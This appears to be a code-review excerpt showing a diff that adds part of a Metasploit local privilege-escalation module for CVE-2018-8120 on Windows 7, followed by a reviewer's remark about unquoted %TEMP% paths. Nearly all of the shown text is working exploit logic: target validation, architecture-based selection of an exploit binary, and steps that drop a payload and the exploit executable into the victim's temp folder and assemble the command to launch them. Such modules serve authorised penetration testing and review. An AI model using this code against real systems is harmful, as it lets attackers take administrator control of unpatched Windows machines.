modules/exploits/windows/local/ms18_8120_win32k_privesc.rb

```diff
@@ -0,0 +1,134 @@
+        [ 'Windows 7 x64', { 'Arch' => ARCH_X64 } ],
+        [ 'Windows 7 x86', { 'Arch' => ARCH_X86 } ]
+      ],
+    'Payload'         => {
+        'Space'       => 4096,
+        'DisableNops' => true
+      },
+    'References'      => [
+        ['BID', '104034'],
+        ['CVE', '2018-8120'],
+        ['URL', 'https://github.com/unamer/CVE-2018-8120'],
+        ['URL', 'https://github.com/bigric3/cve-2018-8120'],
+        ['URL', 'http://bigric3.blogspot.com/2018/05/cve-2018-8120-analysis-and-exploit.html'],
+        ['URL', 'https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8120']
+      ],
+    'DisclosureDate'  => 'May 9 2018',
+    'DefaultTarget'   => 0
+    ))
+  end
+
+  def validate_target
+    if is_system?
+      fail_with(Failure::None, 'Session is already elevated')
+    end
+
+    if sysinfo['OS'] =~ /XP/
+      fail_with(Failure::Unknown, 'The exploit binary does not support Windows XP')
+    end
+  end
+
+  def write_exe_to_target(rexe, rexename)
+    begin
+      vprint_warning("Writing file to %TEMP%")
+      print_good("Exploiting SetImeInfoEx Win32k NULL Pointer Dereference")
+      temprexe = "#{session.fs.file.expand_path("%TEMP%")}\\#{rexename}"
+      write_file_to_target(temprexe,rexe)
+    rescue
+      fail_with(Failure::Unknown, "Writing #{rexename} to disk was unsuccessful")
+    end
+
+    vprint_good("File path: #{temprexe}")
+    temprexe
+  end
+
+  def write_file_to_target(temprexe, rexe)
+    fd = session.fs.file.new(temprexe, "wb")
+    fd.write(rexe)
+    fd.close
+  end
+
+  def create_payload_from_file(exec)
+    vprint_status("Reading payload from file #{exec}")
+    File.read(exec)
+  end
+
+  def check_arch
+    sys_arch = sysinfo['Architecture']
+    if sys_arch == ARCH_X86
+      fail_with(Failure::BadConfig, "Invalid payload architecture") if payload_instance.arch.first == ARCH_X64
+
+      'CVE-2018-8120x86.exe'
+    elsif sys_arch == ARCH_X64
+      'CVE-2018-8120x86_64.exe' if session.arch == ARCH_X86
+
+      'CVE-2018-8120x64.exe'
+    else
+      fail_with(Failure::BadConfig, "Invalid architecture")
+    end
+  end
+
+  def exploit
+    validate_target
+    cve_fname = check_arch
+    rexe = File.join(Msf::Config.data_directory, 'exploits', 'CVE-2018-8120', cve_fname)
+    raw = create_payload_from_file(rexe)
+
+    rexename = "#{Rex::Text.rand_text_alphanumeric(10)}.exe"
+    vprint_status("EXE's name is: #{rexename}")
+    exe = generate_payload_exe
+    tempdir = session.sys.config.getenv('TEMP')
+    tempexename = Rex::Text.rand_text_alpha(rand(8)+6)
+
+    cmd = "#{tempdir}\\#{tempexename}.exe"
+    vprint_status("Preparing payload at #{cmd}")
+    write_file(cmd, exe)
+    vprint_status("Payload uploaded to temp folder")
+    script_on_target = write_exe_to_target(raw, rexename)
+    command = "#{session.fs.file.expand_path("%TEMP%")}\\#{rexename}"
+    vprint_status("Location of CVE-2018-8120.exe is: #{command}")
+
+    command << " #{cmd}"
```

Comment:
Hopefully the `%TEMP%` path never includes spaces, else this would fail horribly due to unquoted args.